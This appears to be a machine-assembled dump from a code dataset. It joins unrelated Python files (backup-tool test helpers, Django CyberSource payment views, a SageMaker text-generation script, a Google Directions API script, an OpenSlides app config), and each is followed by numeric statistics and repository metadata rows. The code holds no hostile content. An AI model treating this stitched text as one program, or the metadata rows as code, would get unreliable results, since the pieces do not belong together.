        return checkpoint_path
    finally:
        backups_manager.Close()
def VerifyBackupManifest(backup, path=None):
    """Verify a backup's content against its manifest.

    The manifest is loaded from `path` when given, otherwise from the
    backup's own manifest file.  Raises on any verifier output or failure.
    """
    if path is None:
        manifest = lib.Manifest.Load(backup.GetManifestPath())
    else:
        manifest = lib.ReadManifestFromImageOrPath(path)

    output = io.StringIO()
    verifier = lib.ManifestVerifier(manifest, backup.GetContentRootPath(), output,
                                    checksum_path_matcher=lib.PathMatcherAll())
    success = verifier.Verify()

    # any non-empty verifier output is a failure
    reported = [line for line in output.getvalue().strip().split('\n') if line]
    output.close()
    AssertLinesEqual(reported, [])
    if not success:
        raise Exception('Verification failed')
@contextlib.contextmanager
def SetLogThrottlerLogAlways(log_throttler):
    """Context manager forcing log_throttler into log-always mode, restoring
    the previous setting on exit (even on exception)."""
    saved = log_throttler.GetLogAlways()
    log_throttler.SetLogAlways(True)
    try:
        yield
    finally:
        log_throttler.SetLogAlways(saved)
def DoCreateCheckpoint(src_root, checkpoints_dir, checkpoint_name, expected_output=[],
                       last_checkpoint_path=None, filter_merge_path=None):
    """Run create-checkpoint, assert its remaining output equals
    expected_output, and return the parsed checkpoint path (or None)."""
    args = ['create-checkpoint',
            '--no-encrypt',
            '--checksum-all',
            '--src-root', src_root,
            '--checkpoints-dir', checkpoints_dir,
            '--checkpoint-name', checkpoint_name]
    for flag, value in (('--last-checkpoint', last_checkpoint_path),
                        ('--filter-merge-path', filter_merge_path)):
        if value is not None:
            args += [flag, value]

    output = io.StringIO()
    AssertEquals(backups_main.Main(args, output), True)

    checkpoint_path = None
    remaining_lines = []
    for line in output.getvalue().strip().split('\n'):
        # the checkpoint-path line is extracted; everything else is compared
        match = re.match('^Created checkpoint at (.+)$', line)
        if match:
            checkpoint_path = match.group(1)
        else:
            remaining_lines.append(line)
    output.close()
    AssertLinesEqual(remaining_lines, expected_output)
    return checkpoint_path
def DoCreateBackup(config, backup_name=None, dry_run=False, expected_output=[]):
    """Run create-backup, assert its remaining output equals expected_output,
    and return the parsed checkpoint path (or None)."""
    cmd_args = ['create-backup',
                '--no-encrypt',
                '--backups-config', config.path]
    if backup_name is not None:
        cmd_args += ['--backup-name', backup_name]

    lines = DoBackupsMain(cmd_args, dry_run=dry_run, expected_output=None)

    checkpoint_path = None
    remaining_lines = []
    for line in lines:
        # pull out the checkpoint-path announcement; compare the rest
        match = re.match('^Created checkpoint at (.+)$', line)
        if match:
            checkpoint_path = match.group(1)
        else:
            remaining_lines.append(line)
    AssertLinesEqual(remaining_lines, expected_output)
    return checkpoint_path
def DoApplyToBackups(config, dry_run=False, deduplicate_min_file_size=1024,
                     checksum_all=True, checksum_hardlinks=True, expected_success=True,
                     expected_output=[]):
    """Run apply-to-backups with the given checksum/dedup options and verify
    its output and exit status."""
    cmd_args = ['apply-to-backups',
                '--backups-config', config.path,
                '--deduplicate-min-file-size', str(deduplicate_min_file_size)]
    # checksum options are on by default; only the opt-out flags are emitted
    cmd_args += [] if checksum_all else ['--no-checksum-all']
    cmd_args += [] if checksum_hardlinks else ['--no-checksum-hardlinks']
    DoBackupsMain(cmd_args, dry_run=dry_run, expected_success=expected_success,
                  expected_output=expected_output)
def DoListBackups(config, dry_run=False, expected_backups=[]):
    """Run list-backups and assert its output equals expected_backups."""
    DoBackupsMain(['list-backups', '--backups-config', config.path],
                  dry_run=dry_run, expected_output=expected_backups)
def DoVerifyBackups(config, dry_run=False, min_backup=None, max_backup=None,
                    full=True, continue_on_error=False, checksum_all=True,
                    expected_success=True, expected_output=[]):
    """Run verify-backups over an optional backup range and verify its
    output and exit status."""
    cmd_args = ['verify-backups',
                '--backups-config', config.path]
    # optional range bounds
    for flag, value in (('--min-backup', min_backup), ('--max-backup', max_backup)):
        if value is not None:
            cmd_args += [flag, value]
    # boolean toggles (only non-default states emit a flag)
    if not full:
        cmd_args += ['--no-full']
    if continue_on_error:
        cmd_args += ['--continue-on-error']
    if not checksum_all:
        cmd_args += ['--no-checksum-all']
    DoBackupsMain(cmd_args, dry_run=dry_run, expected_success=expected_success,
                  expected_output=expected_output)
def DoAddMissingManifestsToBackups(config, expected_output=[]):
    """Run add-missing-manifests-to-backups and verify its output."""
    DoBackupsMain(['add-missing-manifests-to-backups', '--backups-config', config.path],
                  expected_output=expected_output)
def DoDeduplicateBackups(
    config, min_backup=None, max_backup=None, match_older_mtimes=False, dry_run=False, verbose=False,
    expected_output=[]):
    """Run deduplicate-backups over an optional backup range and verify its
    output."""
    cmd_args = ['deduplicate-backups',
                '--min-file-size', '1024',
                '--backups-config', config.path]
    for flag, value in (('--min-backup', min_backup), ('--max-backup', max_backup)):
        if value is not None:
            cmd_args += [flag, value]
    if match_older_mtimes:
        cmd_args += ['--match-older-mtimes']
    DoBackupsMain(cmd_args, dry_run=dry_run, verbose=verbose, expected_output=expected_output)
def DoCloneBackup(config, backup_name, dry_run=False, expected_success=True, expected_output=[]):
    """Run clone-backup for one named backup and verify output and status."""
    DoBackupsMain(['clone-backup',
                   '--backups-config', config.path,
                   '--backup-name', backup_name],
                  dry_run=dry_run, expected_success=expected_success,
                  expected_output=expected_output)
def DoDeleteBackups(config, backup_names, dry_run=False, expected_success=True, expected_output=[]):
    """Run delete-backups for the named backups and verify output and status."""
    cmd_args = ['delete-backups', '--backups-config', config.path]
    # one --backup-name flag per backup, preserving caller order
    for name in backup_names:
        cmd_args += ['--backup-name', name]
    DoBackupsMain(cmd_args, dry_run=dry_run, expected_success=expected_success,
                  expected_output=expected_output)
def DoDeleteBackupsInteractive(config, backup_names=[], min_backup=None, max_backup=None,
                               ignore_matching_renames=False, include_latest_backup=False,
                               dry_run=False, verbose=False,
                               expected_success=True, expected_output=[]):
    """Run delete-backups-interactive with the given selection options and
    verify output and status."""
    cmd_args = ['delete-backups-interactive',
                '--backups-config', config.path]
    for name in backup_names:
        cmd_args += ['--backup-name', name]
    for flag, value in (('--min-backup', min_backup), ('--max-backup', max_backup)):
        if value is not None:
            cmd_args += [flag, value]
    if ignore_matching_renames:
        cmd_args += ['--ignore-matching-renames']
    if include_latest_backup:
        cmd_args += ['--include-latest-backup']
    DoBackupsMain(cmd_args, dry_run=dry_run, verbose=verbose, expected_success=expected_success,
                  expected_output=expected_output)
def DoDumpUniqueFilesInBackups(config, backup_names=[], min_backup=None, max_backup=None,
                               ignore_matching_renames=False, match_previous_only=False,
                               match_next_only=False, dry_run=False, verbose=False,
                               expected_success=True, expected_output=[]):
    """Run dump-unique-files-in-backups with the given selection/matching
    options and verify output and status."""
    cmd_args = ['dump-unique-files-in-backups',
                '--backups-config', config.path]
    for name in backup_names:
        cmd_args += ['--backup-name', name]
    for flag, value in (('--min-backup', min_backup), ('--max-backup', max_backup)):
        if value is not None:
            cmd_args += [flag, value]
    if ignore_matching_renames:
        cmd_args += ['--ignore-matching-renames']
    if match_previous_only:
        cmd_args += ['--match-previous-only']
    if match_next_only:
        cmd_args += ['--match-next-only']
    DoBackupsMain(cmd_args, dry_run=dry_run, verbose=verbose, expected_success=expected_success,
                  expected_output=expected_output)
def DoExtractFromBackups(config, dry_run=False, min_backup=None, max_backup=None,
                         output_image_path=None, paths=[], expected_success=True,
                         expected_output=[]):
    """Run extract-from-backups for the given paths/range and verify output
    and status."""
    cmd_args = ['extract-from-backups',
                '--backups-config', config.path,
                '--no-encrypt',
                '--deduplicate-min-file-size', '1024']
    if output_image_path is not None:
        cmd_args += ['--output-image-path', output_image_path]
    for path in paths:
        cmd_args += ['--path', path]
    for flag, value in (('--min-backup', min_backup), ('--max-backup', max_backup)):
        if value is not None:
            cmd_args += [flag, value]
    DoBackupsMain(cmd_args, dry_run=dry_run, expected_success=expected_success,
                  expected_output=expected_output)
def DoMergeIntoBackups(config, dry_run=False, min_backup=None, max_backup=None,
                       from_image_path=None, expected_success=True,
                       expected_output=[]):
    """Run merge-into-backups over an optional backup range and verify
    output and status."""
    cmd_args = ['merge-into-backups',
                '--backups-config', config.path,
                '--deduplicate-min-file-size', '1024']
    if from_image_path is not None:
        cmd_args += ['--from-image-path', from_image_path]
    for flag, value in (('--min-backup', min_backup), ('--max-backup', max_backup)):
        if value is not None:
            cmd_args += [flag, value]
    DoBackupsMain(cmd_args, dry_run=dry_run, expected_success=expected_success,
                  expected_output=expected_output)
def DoDeleteInBackups(config, dry_run=False, min_backup=None, max_backup=None,
                      paths=[], expected_success=True, expected_output=[]):
    """Run delete-in-backups for the given paths/range and verify output
    and status."""
    cmd_args = ['delete-in-backups',
                '--backups-config', config.path]
    for flag, value in (('--min-backup', min_backup), ('--max-backup', max_backup)):
        if value is not None:
            cmd_args += [flag, value]
    for path in paths:
        cmd_args += ['--path', path]
    DoBackupsMain(cmd_args, dry_run=dry_run, expected_success=expected_success,
                  expected_output=expected_output)
| 40.123028
| 103
| 0.676232
| 1,524
| 12,719
| 5.382546
| 0.129921
| 0.050347
| 0.034865
| 0.024869
| 0.541631
| 0.512252
| 0.477508
| 0.455443
| 0.41814
| 0.358649
| 0
| 0.004347
| 0.204104
| 12,719
| 316
| 104
| 40.25
| 0.805986
| 0
| 0
| 0.450549
| 0
| 0
| 0.126032
| 0.022329
| 0
| 0
| 0
| 0
| 0.029304
| 1
| 0.069597
| false
| 0
| 0.047619
| 0
| 0.131868
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
759fec04ca6bf4fd01f099c1761a43c8c03c98c7
| 9,116
|
py
|
Python
|
ecommerce/views.py
|
umarmughal824/bootcamp-ecommerce
|
681bcc788a66867b8f240790c0ed33680b73932b
|
[
"BSD-3-Clause"
] | 2
|
2018-06-20T19:37:03.000Z
|
2021-01-06T09:51:40.000Z
|
ecommerce/views.py
|
mitodl/bootcamp-ecommerce
|
ba7d6aefe56c6481ae2a5afc84cdd644538b6d50
|
[
"BSD-3-Clause"
] | 1,226
|
2017-02-23T14:52:28.000Z
|
2022-03-29T13:19:54.000Z
|
ecommerce/views.py
|
umarmughal824/bootcamp-ecommerce
|
681bcc788a66867b8f240790c0ed33680b73932b
|
[
"BSD-3-Clause"
] | 3
|
2017-03-20T03:51:27.000Z
|
2021-03-19T15:54:31.000Z
|
"""Views for ecommerce"""
from decimal import Decimal
import logging
from django.conf import settings
from django.contrib.auth import get_user_model
from django.http.response import Http404
from django.shortcuts import get_object_or_404
from django.urls import reverse
from ipware import get_client_ip
from rest_framework import status as statuses
from rest_framework.authentication import SessionAuthentication
from rest_framework.generics import CreateAPIView, GenericAPIView, RetrieveAPIView
from rest_framework.permissions import IsAuthenticated
from rest_framework.renderers import TemplateHTMLRenderer
from rest_framework.response import Response
from rest_framework.validators import ValidationError
from rest_framework.views import APIView
from applications.constants import AppStates
from applications.models import BootcampApplication
from backends.edxorg import EdxOrgOAuth2
from ecommerce.api import (
complete_successful_order,
create_unfulfilled_order,
generate_cybersource_sa_payload,
get_new_order_by_reference_number,
handle_rejected_order,
serialize_user_bootcamp_run,
serialize_user_bootcamp_runs,
)
from ecommerce.constants import CYBERSOURCE_DECISION_ACCEPT, CYBERSOURCE_DECISION_CANCEL
from ecommerce.exceptions import EcommerceException
from ecommerce.models import Line, Order, Receipt
from ecommerce.permissions import IsSignedByCyberSource
from ecommerce.serializers import (
CheckoutDataSerializer,
PaymentSerializer,
OrderSerializer,
)
from hubspot.task_helpers import sync_hubspot_application_from_order
from klasses.models import BootcampRun
from klasses.permissions import CanReadIfSelf
from main.permissions import UserIsOwnerOrAdminPermission
from main.serializers import serialize_maybe_user
log = logging.getLogger(__name__)
User = get_user_model()
class PaymentView(CreateAPIView):
    """
    View for payment API. This creates an Order in our system and provides a dictionary to send to Cybersource.
    """

    authentication_classes = (SessionAuthentication,)
    permission_classes = (IsAuthenticated,)
    serializer_class = PaymentSerializer

    def post(self, request, *args, **kwargs):
        """
        Create an unfulfilled order and return a response for it.

        Validates the payment amount and application id, requires the
        application to be awaiting payment, creates the order, syncs it to
        hubspot, and returns the signed CyberSource payload plus the
        Secure Acceptance URL.
        """
        serializer = self.get_serializer(data=request.data)
        serializer.is_valid(raise_exception=True)
        payment_amount = Decimal(serializer.data["payment_amount"])
        application_id = serializer.data["application_id"]
        # 404 rather than 403 if the application belongs to another user
        application = get_object_or_404(
            BootcampApplication, id=application_id, user=self.request.user
        )
        if application.state != AppStates.AWAITING_PAYMENT.value:
            log.error(
                "User attempted to pay for application %d with invalid state %s",
                application.id,
                application.state,
            )
            raise ValidationError("Invalid application state")
        order = create_unfulfilled_order(
            application=application, payment_amount=payment_amount
        )
        # Sync order data with hubspot
        sync_hubspot_application_from_order(order)
        # CyberSource redirects the user back here after payment
        redirect_url = self.request.build_absolute_uri(reverse("applications"))
        user_ip, _ = get_client_ip(request)
        return Response(
            {
                "payload": generate_cybersource_sa_payload(
                    order, redirect_url, ip_address=user_ip
                ),
                "url": settings.CYBERSOURCE_SECURE_ACCEPTANCE_URL,
            }
        )
class OrderFulfillmentView(APIView):
    """
    View for order fulfillment API. This API is special in that only CyberSource should talk to it.
    Instead of authenticating with OAuth or via session this looks at the signature of the message
    to verify authenticity.
    """

    authentication_classes = ()
    permission_classes = (IsSignedByCyberSource,)

    def post(self, request, *args, **kwargs):  # pylint: disable=unused-argument
        """
        Confirmation from CyberSource which fulfills an existing Order.

        Persists the raw payload as a Receipt, links it to the referenced
        order, and completes or rejects the order based on the decision.
        Always returns 200 (CyberSource ignores the response body).
        """
        # First, save this information in a receipt
        receipt = Receipt.objects.create(data=request.data)

        # Link the order with the receipt if we can parse it
        reference_number = request.data["req_reference_number"]
        order = get_new_order_by_reference_number(reference_number)
        receipt.order = order
        receipt.save()

        decision = request.data["decision"]
        if order.status == Order.FAILED and decision == CYBERSOURCE_DECISION_CANCEL:
            # This is a duplicate message, ignore since it's already handled
            return Response(status=statuses.HTTP_200_OK)
        # guard clause (was a redundant elif after the return above)
        if order.status != Order.CREATED:
            raise EcommerceException(
                "Order {} is expected to have status 'created'".format(order.id)
            )

        if decision != CYBERSOURCE_DECISION_ACCEPT:
            handle_rejected_order(order=order, decision=decision)
        else:
            # (removed leftover commented-out pdb debugging statement)
            complete_successful_order(order)

        # Sync order data with hubspot
        sync_hubspot_application_from_order(order)

        # The response does not matter to CyberSource
        return Response(status=statuses.HTTP_200_OK)
class UserBootcampRunDetail(GenericAPIView):
    """
    Class based view for user bootcamp run view.
    """

    authentication_classes = (SessionAuthentication,)
    permission_classes = (IsAuthenticated, CanReadIfSelf)
    lookup_field = "run_key"
    lookup_url_kwarg = "run_key"
    queryset = BootcampRun.objects.all()

    def get(
        self, request, username, *args, **kwargs
    ):  # pylint: disable=unused-argument
        """
        Returns a serialized bootcamp run and payment for a user
        """
        target_user = get_object_or_404(
            User,
            social_auth__uid=username,
            social_auth__provider=EdxOrgOAuth2.name,
        )
        run = self.get_object()
        payload = serialize_user_bootcamp_run(user=target_user, bootcamp_run=run)
        return Response(payload)
class UserBootcampRunStatement(RetrieveAPIView):
    """
    View class for a user's bootcamp run payment statement
    """

    authentication_classes = (SessionAuthentication,)
    permission_classes = (IsAuthenticated,)
    lookup_field = "run_key"
    lookup_url_kwarg = "run_key"
    queryset = BootcampRun.objects.all()
    renderer_classes = (TemplateHTMLRenderer,)

    def get(self, request, *args, **kwargs):
        """
        Fetches a user's bootcamp run payment information and renders their statement
        (or raises a 404 if they have no payments for the specified bootcamp run)
        """
        run = self.get_object()
        # 404 when the user has no payment lines for this run
        if not Line.for_user_bootcamp_run(request.user, run).count():
            raise Http404
        context = {
            "user": serialize_maybe_user(request.user),
            "bootcamp_run": serialize_user_bootcamp_run(
                user=request.user, bootcamp_run=run
            ),
        }
        return Response(context, template_name="bootcamp/statement.html")
class UserBootcampRunList(APIView):
    """
    Class based view for user bootcamp run list view.
    """

    authentication_classes = (SessionAuthentication,)
    permission_classes = (IsAuthenticated, CanReadIfSelf)

    def get(
        self, request, username, *args, **kwargs
    ):  # pylint: disable=unused-argument
        """
        Returns serialized bootcamp runs and payments for all runs that a user can pay for.
        """
        target_user = get_object_or_404(
            User,
            social_auth__uid=username,
            social_auth__provider=EdxOrgOAuth2.name,
        )
        return Response(serialize_user_bootcamp_runs(user=target_user))
class CheckoutDataView(RetrieveAPIView):
    """
    List application ecommerce data for a user, for payable applications
    """

    authentication_classes = (SessionAuthentication,)
    permission_classes = (IsAuthenticated,)
    serializer_class = CheckoutDataSerializer

    def get_queryset(self):
        """Filter on valid applications for the user"""
        payable = BootcampApplication.objects.filter(
            user=self.request.user, state=AppStates.AWAITING_PAYMENT.value
        )
        payable = payable.select_related("bootcamp_run")
        # prefetch everything the serializer walks to avoid N+1 queries
        payable = payable.prefetch_related(
            "bootcamp_run__personal_prices",
            "bootcamp_run__installment_set",
            "orders",
            "orders__line_set",
        )
        return payable.order_by("id")

    def get_object(self):
        """Get the application given the query parameter"""
        requested_id = self.request.query_params.get("application")
        return get_object_or_404(self.get_queryset(), id=requested_id)
class OrderView(RetrieveAPIView):
    """API view for Orders"""

    permission_classes = (IsAuthenticated, UserIsOwnerOrAdminPermission)
    serializer_class = OrderSerializer
    queryset = Order.objects.all()
    # presumably the field UserIsOwnerOrAdminPermission uses to establish
    # ownership of the order — confirm against that permission class
    owner_field = "user"
| 34.793893
| 111
| 0.691751
| 975
| 9,116
| 6.252308
| 0.264615
| 0.037894
| 0.024606
| 0.011483
| 0.274934
| 0.225558
| 0.170932
| 0.148294
| 0.089239
| 0.089239
| 0
| 0.004894
| 0.237933
| 9,116
| 261
| 112
| 34.927203
| 0.872607
| 0.160926
| 0
| 0.22807
| 0
| 0
| 0.052176
| 0.010949
| 0
| 0
| 0
| 0
| 0
| 1
| 0.040936
| false
| 0
| 0.175439
| 0
| 0.450292
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
75a10f7c8bb2269ffd29a74f44cb282618db5d67
| 3,334
|
py
|
Python
|
sagemaker-python-sdk/pytorch_lstm_word_language_model/source/generate.py
|
BluePilgrim/amazon-sagemaker-examples
|
e20c855dd912331a9380980712f2fef7d05d3d2d
|
[
"Apache-2.0"
] | 7
|
2018-10-25T16:35:54.000Z
|
2022-02-12T15:24:11.000Z
|
sagemaker-python-sdk/pytorch_lstm_word_language_model/source/generate.py
|
vlordier/amazon-sagemaker-examples
|
6c59b6e435f040bdbe6a7c346fc0ce397f7746d8
|
[
"Apache-2.0"
] | 1
|
2019-04-10T20:21:18.000Z
|
2019-04-10T20:21:18.000Z
|
sagemaker-python-sdk/pytorch_lstm_word_language_model/source/generate.py
|
vlordier/amazon-sagemaker-examples
|
6c59b6e435f040bdbe6a7c346fc0ce397f7746d8
|
[
"Apache-2.0"
] | 2
|
2020-02-19T03:10:18.000Z
|
2022-03-16T12:49:31.000Z
|
import json
import logging
import os
import torch
from rnn import RNNModel
import data
JSON_CONTENT_TYPE = 'application/json'
logger = logging.getLogger(__name__)
def model_fn(model_dir):
    """Load the trained RNN language model and its corpus from ``model_dir``.

    Returns a dict with keys ``model`` (the RNNModel, in eval mode, moved
    to GPU when available) and ``corpus`` (the ``data.Corpus`` providing
    the token <-> word mapping).
    """
    logger.info('Loading the model.')
    model_info = {}
    # Hyperparameters saved at training time; needed to rebuild the network
    # with the same architecture before loading weights.
    with open(os.path.join(model_dir, 'model_info.pth'), 'rb') as f:
        model_info = torch.load(f)
    print('model_info: {}'.format(model_info))
    device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
    logger.info('Current device: {}'.format(device))
    model = RNNModel(rnn_type=model_info['rnn_type'], ntoken=model_info['ntoken'],
                     ninp=model_info['ninp'], nhid=model_info['nhid'], nlayers=model_info['nlayers'],
                     dropout=model_info['dropout'], tie_weights=model_info['tie_weights'])
    with open(os.path.join(model_dir, 'model.pth'), 'rb') as f:
        model.load_state_dict(torch.load(f))
    # after load the rnn params are not a continuous chunk of memory
    # this makes them a continuous chunk, and will speed up forward pass
    model.rnn.flatten_parameters()
    model.to(device).eval()
    logger.info('Loading the data.')
    # The corpus (vocabulary) is shipped alongside the model artifacts.
    corpus = data.Corpus(model_dir)
    logger.info('Done loading model and corpus. Corpus dictionary size: {}'.format(len(corpus.dictionary)))
    return {'model': model, 'corpus': corpus}
def input_fn(serialized_input_data, content_type=JSON_CONTENT_TYPE):
    """Deserialize a JSON request body, validating the sampling temperature."""
    logger.info('Deserializing the input data.')
    # Guard clause: reject anything that is not JSON up front.
    if content_type != JSON_CONTENT_TYPE:
        raise Exception('Requested unsupported ContentType in content_type: ' + content_type)
    parsed = json.loads(serialized_input_data)
    if parsed['temperature'] < 1e-3:
        raise Exception('\'temperature\' has to be greater or equal 1e-3')
    return parsed
def output_fn(prediction_output, accept=JSON_CONTENT_TYPE):
    """Serialize the generated text when the client accepts JSON."""
    logger.info('Serializing the generated output.')
    # Guard clause: only JSON responses are supported.
    if accept != JSON_CONTENT_TYPE:
        raise Exception('Requested unsupported ContentType in Accept: ' + accept)
    return json.dumps(prediction_output), accept
def predict_fn(input_data, model):
    """Generate text with the loaded language model.

    ``input_data`` keys used here: 'seed' (RNG seed), 'temperature'
    (softmax temperature, validated >= 1e-3 in input_fn), 'words'
    (number of tokens to generate).  ``model`` is the dict returned by
    model_fn.  Returns the generated text as one string.
    """
    logger.info('Generating text based on input parameters.')
    corpus = model['corpus']
    model = model['model']
    device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
    logger.info('Current device: {}'.format(device))
    torch.manual_seed(input_data['seed'])
    ntokens = len(corpus.dictionary)
    # NOTE: `input` shadows the builtin; it is a random 1x1 start token.
    input = torch.randint(ntokens, (1, 1), dtype=torch.long).to(device)
    hidden = model.init_hidden(1)
    logger.info('Generating {} words.'.format(input_data['words']))
    result = []
    with torch.no_grad(): # no tracking history
        for i in range(input_data['words']):
            output, hidden = model(input, hidden)
            # Temperature scaling: lower temperature -> sharper distribution.
            word_weights = output.squeeze().div(input_data['temperature']).exp().cpu()
            word_idx = torch.multinomial(word_weights, 1)[0]
            # Feed the sampled token back in as the next input.
            input.fill_(word_idx)
            word = corpus.dictionary.idx2word[word_idx]
            # Vocabulary entries may be bytes; normalize to str.
            word = word if type(word) == str else word.decode()
            if word == '<eos>':
                word = '\n'
            elif i % 12 == 11:
                # Hard-wrap the output every 12 words.
                word = word + '\n'
            else:
                word = word + ' '
            result.append(word)
    return ''.join(result)
| 39.223529
| 107
| 0.654469
| 433
| 3,334
| 4.877598
| 0.327945
| 0.051136
| 0.035511
| 0.017045
| 0.20786
| 0.154356
| 0.109848
| 0.109848
| 0.080492
| 0.080492
| 0
| 0.005368
| 0.217756
| 3,334
| 84
| 108
| 39.690476
| 0.804448
| 0.044691
| 0
| 0.058824
| 0
| 0
| 0.178246
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.058824
| false
| 0
| 0.088235
| 0
| 0.205882
| 0.014706
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
75a2597adcdcae122cb7a9e4d78b3707b95ae319
| 889
|
py
|
Python
|
get_data.py
|
fromdatavistodatascience/Boston-Airpot-Traffic-Visualisation
|
9f30e89e68c25e6fbcf13d84fee561b53ff70d84
|
[
"MIT"
] | null | null | null |
get_data.py
|
fromdatavistodatascience/Boston-Airpot-Traffic-Visualisation
|
9f30e89e68c25e6fbcf13d84fee561b53ff70d84
|
[
"MIT"
] | null | null | null |
get_data.py
|
fromdatavistodatascience/Boston-Airpot-Traffic-Visualisation
|
9f30e89e68c25e6fbcf13d84fee561b53ff70d84
|
[
"MIT"
] | null | null | null |
import pandas as pd
import numpy as np
import json
import requests
#Retrieving my api keys information to access the Google API.
def get_keys(path):
    """Read and return the JSON credentials stored at *path*."""
    with open(path) as key_file:
        parsed = json.load(key_file)
    return parsed
# Load the Google API key from a local secrets file (kept out of the repo).
keys = get_keys("/Users/jjherranzsarrion/.secret/google_blog2_api.json")
api_key = keys['api_key']
# Directions request: dog park in Stoneham -> Logan airport Terminal C.
url = 'https://maps.googleapis.com/maps/api/directions/json?'
origin = 'Sheepfold+Dog+Park+Fells+Path+Stoneham+MA'
destination = 'Terminal+C+Boston+Logan+International+Airport+Boston+MA+02128'
departure_time = '1566819000' #time in seconds from midnight 1st Jan 1970 (Unix start time) until Monday 19th August at 07:30 AM.
url_params = f"origin={origin}&destination={destination}&departure_time={departure_time}&key={api_key}"
request_url = url + url_params
# Query the Directions API and persist the raw JSON response for later use.
response = requests.get(request_url)
with open('response.json', 'w') as f:
    json.dump(response.json(), f)
| 31.75
| 130
| 0.743532
| 135
| 889
| 4.792593
| 0.562963
| 0.027821
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.035111
| 0.134983
| 889
| 27
| 131
| 32.925926
| 0.806242
| 0.177728
| 0
| 0
| 0
| 0
| 0.447802
| 0.332418
| 0
| 0
| 0
| 0
| 0
| 1
| 0.055556
| false
| 0
| 0.222222
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
75a4801e3fd9b2dd8d7fd997f38c4f96f2672de6
| 1,807
|
py
|
Python
|
openslides_protocol/apps.py
|
OpenSlides/openslides-protocol
|
71366a4f251165384dd359a31fdc0fab79a652a1
|
[
"MIT"
] | null | null | null |
openslides_protocol/apps.py
|
OpenSlides/openslides-protocol
|
71366a4f251165384dd359a31fdc0fab79a652a1
|
[
"MIT"
] | 11
|
2017-08-02T10:48:24.000Z
|
2018-10-19T13:53:51.000Z
|
openslides_protocol/apps.py
|
OpenSlides/openslides-protocol
|
71366a4f251165384dd359a31fdc0fab79a652a1
|
[
"MIT"
] | 2
|
2017-05-10T14:11:34.000Z
|
2018-01-10T11:44:10.000Z
|
from django.apps import AppConfig
from openslides.utils.collection import Collection
from . import (
__description__,
__license__,
__url__,
__verbose_name__,
__version__,
)
class ProtocolAppConfig(AppConfig):
    """Django AppConfig for the OpenSlides protocol plugin.

    Exposes the plugin metadata from the package's dunder attributes and
    wires config variables, signals and REST viewsets in ready().
    """
    name = 'openslides_protocol'
    verbose_name = __verbose_name__
    description = __description__
    version = __version__
    license = __license__
    url = __url__
    # presumably consumed by the OpenSlides plugin loader to register the
    # Angular frontend module — confirm against OpenSlides core
    angular_site_module = True
    js_files = [
        'static/js/openslides_protocol/base.js',
        'static/js/openslides_protocol/site.js',
        'static/js/openslides_protocol/templatehooks.js',
        'static/js/openslides_protocol/templates.js'
    ]

    def ready(self):
        """Register config variables, signals and REST viewsets once apps are loaded."""
        # Import all required stuff.  Done lazily here because the app
        # registry is not ready at module import time.
        from openslides.core.config import config
        from openslides.core.signals import post_permission_creation
        from openslides.utils.rest_api import router
        from .config_variables import get_config_variables
        from .signals import add_permissions_to_builtin_groups
        from .views import ObjectProtocolViewSet, ProtocolViewSet

        # Define config variables
        config.update_config_variables(get_config_variables())

        # Connect signals.
        post_permission_creation.connect(
            add_permissions_to_builtin_groups,
            dispatch_uid='protocol_add_permissions_to_builtin_groups'
        )

        # Register viewsets.
        router.register(self.get_model('ObjectProtocol').get_collection_string(), ObjectProtocolViewSet)
        router.register(self.get_model('Protocol').get_collection_string(), ProtocolViewSet)

    def get_startup_elements(self):
        """Yield the collections pushed to clients on startup."""
        yield Collection(self.get_model('ObjectProtocol').get_collection_string())
        yield Collection(self.get_model('Protocol').get_collection_string())
| 34.09434
| 104
| 0.722191
| 189
| 1,807
| 6.42328
| 0.343915
| 0.074135
| 0.059308
| 0.085667
| 0.327018
| 0.138386
| 0.138386
| 0
| 0
| 0
| 0
| 0
| 0.204759
| 1,807
| 52
| 105
| 34.75
| 0.844816
| 0.047593
| 0
| 0
| 0
| 0
| 0.155594
| 0.118881
| 0
| 0
| 0
| 0
| 0
| 1
| 0.05
| false
| 0
| 0.225
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
75a691a31ac0f85d25914cc8c58acb2e67e97fd0
| 9,700
|
py
|
Python
|
scripts/gen_report.py
|
twjang/korea_apartment_price
|
cd1414dfe6fe46e7d47625d2f65abe07f7c2db75
|
[
"MIT"
] | 1
|
2021-12-14T13:03:38.000Z
|
2021-12-14T13:03:38.000Z
|
scripts/gen_report.py
|
twjang/korea_apartment_price
|
cd1414dfe6fe46e7d47625d2f65abe07f7c2db75
|
[
"MIT"
] | null | null | null |
scripts/gen_report.py
|
twjang/korea_apartment_price
|
cd1414dfe6fe46e7d47625d2f65abe07f7c2db75
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
import json
